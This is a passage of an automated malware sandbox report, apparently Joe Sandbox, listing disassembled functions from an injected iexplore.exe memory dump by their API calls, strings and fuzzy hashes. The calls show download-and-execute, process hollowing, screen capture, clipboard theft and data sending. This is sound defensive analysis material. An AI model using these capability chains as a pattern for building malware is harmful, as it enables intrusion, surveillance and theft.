              • Opcode Fuzzy Hash: f3eec222462579c493b4b8f660279e06dcf6d29854e56ddc35d6d2e5544d44eb
              • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
              APIs
              • __EH_prolog.LIBCMT ref: 00408811
              • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
              • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
              • String ID:
              • API String ID: 1771804793-0
              • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
              • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
              • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
              • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
              APIs
              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: DownloadExecuteFileShell
              • String ID: C:\Program Files (x86)\Internet Explorer\iexplore.exe$open
              • API String ID: 2825088817-263617989
              • Opcode ID: cc29152d37cef2a0f6b905280b5a34edbff6185e784de3eeb41b1ebdaa99250b
              • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
              • Opcode Fuzzy Hash: cc29152d37cef2a0f6b905280b5a34edbff6185e784de3eeb41b1ebdaa99250b
              • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorInfoLastLocale$_free$_abort
              • String ID: @"a/
              • API String ID: 2829624132-2936340451
              • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
              • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
              • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
              • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: FileFind$FirstNextsend
              • String ID: XPG$XPG
              • API String ID: 4113138495-1962359302
              • Opcode ID: 11350949d9fcc842171cf69227dc5de75b050bd169a1425ba824deee8cc34b80
              • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
              • Opcode Fuzzy Hash: 11350949d9fcc842171cf69227dc5de75b050bd169a1425ba824deee8cc34b80
              • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
              APIs
              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                • Part of subcall function 0041376F: RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.0.0 Pro), ref: 004137A6
                • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(?,?,?,0040F853,004674B8,5.0.0 Pro), ref: 004137B1
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateInfoParametersSystemValue
              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
              • API String ID: 4127273184-3576401099
              • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
              • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
              • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
              • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID: @"a/
              • API String ID: 3906539128-2936340451
              • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
              • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
              • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
              • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: .$@"a/
              • API String ID: 0-3815637422
              • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
              • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
              • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
              • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
              APIs
              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: InfoLocale
              • String ID: @"a/$GetLocaleInfoEx
              • API String ID: 2299586839-681010928
              • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
              • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
              • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
              • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
              APIs
              • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
              • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
              • ExitProcess.KERNEL32 ref: 004432EF
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
              • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
              • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
              • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
              APIs
              • OpenClipboard.USER32(00000000), ref: 0040B711
              • GetClipboardData.USER32(0000000D), ref: 0040B71D
              • CloseClipboard.USER32 ref: 0040B725
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Clipboard$CloseDataOpen
              • String ID:
              • API String ID: 2058664381-0
              • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
              • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
              • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
              • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$_free$InfoLocale_abort
              • String ID: @"a/
              • API String ID: 1663032902-2936340451
              • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
              • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
              • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
              • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem_abort_free
              • String ID: lJD
              • API String ID: 1084509184-3316369744
              • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
              • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
              • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
              • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem_abort_free
              • String ID: lJD
              • API String ID: 1084509184-3316369744
              • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
              • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
              • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
              • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
              APIs
                • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
              • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CriticalEnterEnumLocalesSectionSystem
              • String ID: @"a/
              • API String ID: 1272433827-2936340451
              • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
              • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
              • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
              • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
              APIs
              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
              • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
              • Opcode Fuzzy Hash: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
              • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
              APIs
              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: FeaturePresentProcessor
              • String ID:
              • API String ID: 2325560087-0
              • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
              • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
              • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
              • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$InfoLocale_abort_free
              • String ID:
              • API String ID: 2692324296-0
              • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
              • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
              • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
              • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem_abort_free
              • String ID:
              • API String ID: 1084509184-0
              • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
              • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
              • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
              • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
              APIs
              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
              • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
              • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
              • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
              • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
              • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
              • Instruction Fuzzy Hash:
              APIs
              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
              • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
              • DeleteDC.GDI32(00000000), ref: 00418F2A
              • DeleteDC.GDI32(00000000), ref: 00418F2D
              • DeleteObject.GDI32(00000000), ref: 00418F30
              • SelectObject.GDI32(00000000,00000000), ref: 00418F51
              • DeleteDC.GDI32(00000000), ref: 00418F62
              • DeleteDC.GDI32(00000000), ref: 00418F65
              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
              • GetIconInfo.USER32(?,?), ref: 00418FBD
              • DeleteObject.GDI32(?), ref: 00418FEC
              • DeleteObject.GDI32(?), ref: 00418FF9
              • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
              • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
              • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
              • DeleteDC.GDI32(?), ref: 0041917C
              • DeleteDC.GDI32(00000000), ref: 0041917F
              • DeleteObject.GDI32(00000000), ref: 00419182
              • GlobalFree.KERNEL32(?), ref: 0041918D
              • DeleteObject.GDI32(00000000), ref: 00419241
              • GlobalFree.KERNEL32(?), ref: 00419248
              • DeleteDC.GDI32(?), ref: 00419258
              • DeleteDC.GDI32(00000000), ref: 00419263
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
              • String ID: DISPLAY
              • API String ID: 479521175-865373369
              • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
              • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
              • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
              • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
              APIs
              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
              • GetProcAddress.KERNEL32(00000000), ref: 00418139
              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
              • GetProcAddress.KERNEL32(00000000), ref: 0041814D
              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
              • GetProcAddress.KERNEL32(00000000), ref: 00418161
              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
              • GetProcAddress.KERNEL32(00000000), ref: 00418175
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
              • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
              • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
              • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
              • ResumeThread.KERNEL32(?), ref: 00418435
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
              • GetCurrentProcess.KERNEL32(?), ref: 00418457
              • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
              • GetLastError.KERNEL32 ref: 0041847A
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
              • API String ID: 4188446516-3035715614
              • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
              • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
              • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
              • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
              APIs
                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
